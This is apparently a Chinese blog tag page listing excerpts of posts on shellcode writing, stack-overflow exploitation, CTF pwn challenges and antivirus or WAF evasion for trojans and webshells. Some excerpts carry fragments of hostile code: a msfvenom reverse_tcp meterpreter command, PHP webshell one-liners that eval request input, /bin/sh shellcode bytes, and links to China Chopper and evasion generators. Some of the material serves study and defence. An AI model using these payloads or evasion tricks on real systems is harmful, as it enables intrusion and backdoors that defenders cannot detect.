免杀Shellcode

木马免杀全攻略

木马免杀全攻略[续](图)大家好,很高兴又与大家见面了,不知道大家对上期的文章是否满意,但是木马的免杀很多啊!
usertony·2020-06-27 10:30

PE感染-添加节区

非随机基址//感染指定目录的PE文件charItIs[MAX_PATH]="D:\\桌面\\感染PE\\感染目录";//添加了一个新节区//然后shellcode是添加一个名为a,密码为a的administrator
whitesilt·2020-06-27 03:25

网络安全入门资料

课程安全圈白帽子学院信息安全经典书籍教学视频论坛《黑客攻防技术宝典(web实战篇)》《白帽子讲web安全》《web前端黑客技术解密》《WEB之困》《SQL注入攻击与防御》《Metasploit渗透测试指南》《黑客免杀攻防
小心灵呀·2020-06-27 02:32

黑客攻防入门(一)缓冲区(堆栈)溢出

溢出的目的是重写程序的运行堆栈,使调用返回堆栈包含一个跳向预设好的程序的程序(代码),这个程序通常称为shellcode,通过这个shellcode就能获得如期的shell,更有可能获得root。
屎壳郞·2020-06-26 22:14

栈溢出攻击和shellcode

文章会做一个栈溢出攻击的DEMO,来展示一个典型的shellcode是如何打造,如何工作的。
_LittleEmperor·2020-06-26 22:31

Win 7下定位kernel32.dll基址及shellcode编写

t=122260Win7下定位kernel32.dll基址及shellcode编写Author:CryinData:2010.10.14Blog:http://hi.baidu.com/justear为了使
Puzz1e·2020-06-26 22:38

windows:shellcode 原理

shellcode,一段短小精干的代码,放在任何地方都能执行,不依赖当前所处环境,那么就有这么几点要求:不能有全局变量:函数里的局部变量在栈空间,地址是执行的时候动态分配的;但全局变量在编译时,会由编译器分配好固定的存储空间
第七子007·2020-06-26 18:00

Metasploit简介

其他重要的子项目包括Opcode数据库、shellcode档案、安全研究等内容。Metasploi
taozpwater·2020-06-26 18:39

pwnable.tw - orw

openreadwrite函数程序运行哪怕是输入一个字母,程序仍然会出现段错误检查安全措施可见栈上开了CANARY程序在IDA中反编译可见:函数orw_seccomp反编译:程序从终端读入内容,存放在shellcode
PolluxAvenger·2020-06-26 17:32

木马免杀原理详解

免杀常用的工具:Ollydbg调试器简称OD
star1389·2020-06-26 14:01

MSF生成meterpreter及静态免杀

1.静态免杀1.1编译c文件,静态免杀1.1.1生成shellcode在kali命令行输入msfvenom-pwindows/meterpreter/reverse_tcp-ex86/shikata_ga_nai-i12
斯利普·2020-06-26 13:41

渗透测试web安全 - webshell 免杀 绕过waf总结

在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell篇总结如下,肯定有遗漏,之后学习之后再继续补充。小型网站常见的waf有:D盾一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异形脚本防御等等。防止黑客入侵和提权,让服务器更安全。云锁云上的安全边界越来越模糊,依靠传统的硬件堆叠的安全防御方式已
white-night·2020-06-26 10:00

介绍 RWSH – Ray’s Web SHell (php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话)

中国菜刀下载,基于原版中国菜刀优化版20160309.下载地址:http://download.csdn.net/detail/settoken/9457567http://pan.baidu.com/s/1jHoJxHWChinachopperhttp://pan.baidu.com/s/1eRxEYjCRWSH(pronounced“rush”–credittomyfriendGrevfort
settoken·2020-06-26 08:50

php回调后门,php过WAF一句话,php最新一句话,php过狗一句话.

9457567http://pan.baidu.com/s/1jHoJxHWChinachopperhttp://pan.baidu.com/s/1eRxEYjC分享一下,一些不需要动态函数、不用eval、不含敏感函数、免杀免拦截过
settoken·2020-06-26 08:18

shellcode之二:简述漏洞提权

声明:主要内容来自《TheShellcoder'sHandbook》,摘录重点作为笔记并加上个人的一些理解,如有错,请务必指出。
sepnic·2020-06-26 08:03

免杀测试】Kali之Metasploit几款工具免杀练习

普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。
Sec朔方·2020-06-26 08:34

shellcode题总结

shellcode题总结有时shellcode受限,最好的方法一般就是勉强的凑出sysread系统调用来输入shellcode主体。下面从几个题来加深理解。
haivk·2020-06-26 07:55

一个栈溢出漏洞利用的病毒分析

样本概况样本基本信息利用VirusTotal扫描漏洞分析POC分析分析shellcode小结恶意代码分析样本概况样本基本信息病毒名称:doc_sampleMD5值:52E3DDB2349A26BB2F6AE66880A6130CSHA1
richard1230·2020-06-26 05:10

shecodject生成免杀木马,一步过360、火绒

使用python3shecodject.py功能介绍mpr生成msf有效shellcodemprrunexe生成shellcode后返回主界面生成exe文件run注意:记得设True,让exe程序运行时不会弹出控制台
被遗弃的盒子·2020-06-26 03:05

无限免杀D盾脚本之aspx ——yzddMr6

前言自己曾经写过一篇文章:利用随机异或无限免杀某盾php的webshell免杀方法有很多,但是市面上很少有讲aspx免杀的文章.因为aspx的权限一般较大,对于渗透过程中还是很重要的,所以就想着写一篇文章来简单的介绍下
yzddMr6·2020-06-26 01:02

webshell-venom 3.2 :免杀D盾无压力 ——yzddMr6

前言感谢大家对webshell-venom的支持星球自开启以来已经源源不断有各路大佬加入并且一起交流了很多的思路跟想法为了不辜负大家的期望自己这几天一大早上就起来写脚本发文章,基本上星球里都是一天两更项目在今天也达到了700个星image所以特地推出webshell-venom3.2版本webshell-venom3.2的蚁剑插件版也已经在蚁剑商店上市image原来已经有的点击更新即可3.2是gi
yzddMr6·2020-06-26 01:02

一键免杀D盾(免杀一句话无限生成) ——yzddMr6

前言最近逛帖子发现好多人还在找各种免杀一句话。。。都9102年了都不知道有webshell-venom这个东西吗。。。看来我的宣传还是不到位。。。
yzddMr6·2020-06-26 01:02

ROP之ret2libc

ROP之ret2libc修改返回地址,让其指向内存中已有的某个函数当函数调用栈的没有执行权限时,就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数,libc动态链接库中通常就有需要的函数
酉酉囧·2020-06-25 21:00

远控免杀专题(29)-C#加载shellcode免杀-5种方式(VT免杀率8-70)

0x00免杀能力一览表几点说明:1、表中标识√说明相应杀毒软件未检测出病毒,也就是代表了Bypass。
go0dStudy·2020-06-25 21:10

Metasploit(后渗透攻击:操作系统后门)

1.Cymothoa后门Cymothoa是一款可以将ShellCode注入现有进程(即插进程)的后门工具。借助这种注入手段,,他能够把shellcode伪装成常规程序。
毕竟话少·2020-06-25 20:04

【个人笔记】过D盾PHP免杀一句话

不过D盾还能叫马吗第一种c);}}$zxvg=newZXVG();@$zxvg->c=$_POST['mr6'];第二种<?phpeval(''.get().'');/***@returnstring*/functionget(){$get=$_GET['password'];return$get;}
A4m1n·2020-06-25 19:14

黑客攻防入门(五)通用的缓冲区漏洞攻击代码

#include#include#include#includecharshellcode[]=/*shellcodeexec/bin/sh*/"\xeb\x2b\x59\x55\x48\x89\xe5
屎壳郞·2020-06-25 17:47

XSS----shellcode的调用

shellcode、exploit、pocshellcode:最初是指溢出程序和蠕虫病毒核心,实际上是指利用漏洞所执行的一段代码Exploit:英文意思利用,编写好的漏洞利用工具或程序,具有攻击性Poc
丶喝咖啡的猫·2020-06-25 15:02

Webshell免杀套路

0x00说明一下,之所转载这篇文章的原因因为前几天详细看了几个小马,想研究一下免杀的技巧,研究了下火绒安全对小马的免杀效果,跟下面描述的效果差不多,不过像D盾,360网站安全卫士等等的这些WAF效果我就不清楚了其实总结下来
菜鸟之小菜·2020-06-25 14:30

深究异或webshell原理以及服务器处理免杀的流程

01.前言之前一直接触rce;但是总是可以看到过滤就可以考虑无数字和字母的webshell或者免杀马,但是今天碰到一道题,让我深刻理解了深究的重要性;不能无脑依靠网上无数字和字母的webshell了;需要知道细节
合天智汇·2020-06-25 13:13

栈溢出学习(三)之简单ROP

前言栈溢出学习(三),讲述简单ROP实现栈溢出的原理及其实践方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp&return2libc栈溢出学习(
Pz_mstr·2020-06-25 09:29

栈溢出学习(五)之NX,ASLR绕过方法

前言栈溢出学习(五)之NX,ASLR绕过方法,讲述NX,ASLR保护机制及其绕过方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp&return2libc
Pz_mstr·2020-06-25 09:29

栈溢出学习(四)之Hijack GOT

前言栈溢出学习(四),讲述HijackGOT的基本原理及其利用ROPchain实现HijackGOT的方法系列文章栈溢出学习(一)之利用预留后门&return2shellcode栈溢出学习(二)之jmpesp
Pz_mstr·2020-06-25 09:29

PWN-shellcode获取与编写

当我们在获得程序的漏洞后,就可以在程序的漏洞处执行特定的代码,而这些代码也就是俗称的shellcode。而shellcode该怎么获得呢?
Jaken1223·2020-06-25 09:44

攻防技术——源码免杀实战

源码免杀实战QQ1285575001WechatM010527技术交流QQ群599020441纪年科技aming#1看一下今天的马子Gh0st改良版开始搞事免杀原理病毒样本内存地址/段分析师定位原始特征码
amingMM·2020-06-25 07:35

shellcode——payload分离免杀

anti-virussecuritysoftware三种特点基于特征基于行为基于云查杀-特征查杀都是特别针对PE头文件的查杀当payload文件越大的时候,特征越容易查杀反制查杀机制(概括)采取特征与行为分离免杀避免
amingMM·2020-06-25 07:35

基于 msf 的免杀项目的一些工具

https://mp.weixin.qq.com/s/W7mBroOtVUdMHA7f07J_7Q转载自信安之路这两个月来持续的糜烂,乱七八糟的事,在今天lol完觉得不能再浪费时间来Orz,向大神们开始学习来0x02avet工具使用此工具当年在2017年黑帽大会上惊艳全场,使用kali下载:gitclonehttps://github.com/govolution/avet.git进入avet文件
ProjectDer·2020-06-25 06:28

分享一些无特征PHP一句话-20150719

分享些不需要动态函数、不用eval、不含敏感函数、免杀免拦截的一句话。
qq_27446553·2020-06-25 03:26

Webshell免杀绕过waf

Webshell免杀绕过waf0x01前言#尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧0x02目录#关于eval于assert字符串变形定义函数绕过回调函数回调函数变形特殊字符干扰数组类编码绕过无字符特征马
卿's Blog·2020-06-25 00:05

vc++木马源码免杀一些常用方法

vc++木马源码免杀一些常用方法1.字符串连接////////////////////////////////////////////////////////////把字符串"canxin"连接起来(字符串连接法
卿's Blog·2020-06-25 00:05

VirtualAlloc加载shellcode免杀一点记录

一个很好的学习网站推荐一下:https://docs.microsoft.com/zh-cn/windows/win32/api/0x01VirtualAllocVirtualAlloc:在虚拟地址空间中预定一块内存区域;VirtualAlloc是Windows提供的API,通常用来分配大块的内存。PVOIDVirtualAlloc(PVOIDpvAddress,SIZE_TdwSize,DWOR
卿's Blog·2020-06-25 00:04

使用Windows自带命令校验文件哈希值

可用于校验文件MD5、SHA1、SHA256,下载恶意文件和免杀。这里记录如何使用这个程序校验文件,网上很多资源的下载很多都会提供文件的md5
m0c1nu7·2020-06-24 15:19

使用python命令执行shell脚本(python3版本)

subprocess是Python3才有的包,因此代码运行环境必须python3+#useshellcodetogeneratetheresult#y4mtobmp:ffmpeg-ixx.y4m-vsync0xx
mdjxy63·2020-06-24 14:40

Metasploit生成免杀恶意程序

2.生成独立运行的二进制文件在演示免杀技术之前,先用MSF攻击载荷生成器(msfvenom)创建一个可独立运行的Metasploit载荷程序。
忘带剑的侠客·2020-06-24 13:52

2018pupstudy后门漏洞

漏洞:程序包自带的PHP的php_xmlrpc.dll模块中有隐藏后门,使用gzuncompress函数进行免杀(IDA可查)影响版本如下phpStudy20180211版本php5.4.45与php5.2.17ext
D1stiny·2020-06-24 12:25

XSS篇之认识XSS

有黑客把XSS攻击看作是新型的缓冲区溢出攻击,而JavaScript是新型的ShellCode。最大的特点就是向页面注入恶意的程序或代码,以达到劫持用户会话,管理员cookie,留后门等目的。
D1stiny·2020-06-24 12:52

栈溢出攻击提权进入root shell

以前对栈溢出攻击只是一种感官上的,最近学了shellcode,才真切地感觉到了栈溢出攻击有多么危险。
痕枫冷·2020-06-24 11:30

ptrace之SMC,反调试

include#include#definePAGE_START(p)((p)&~4095)#definePAGE_END(p)((p)+PAGE_START(p))staticcharencrypt_shellcode
痕枫冷·2020-06-24 11:58

逆向工程核心原理读书笔记-代码注入

所以DLL注入技术主要用在代码量大且复杂的时候,而代码注入技术则适用于代码量小且简单的情况比如shellcode。下面我们先测试一下代码。运行notepad.exe并查看PID。在命令
H-KING·2020-06-24 06:56

黑教程集合

个大站教程篇)==================http://115.com/folder/f12108d5969#22套甲壳虫全部教程http://115.com/folder/f128ee9ccca#各站免杀
风云天空·2020-06-24 03:54
上一页 21 22 23 24 25 26 27 28 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他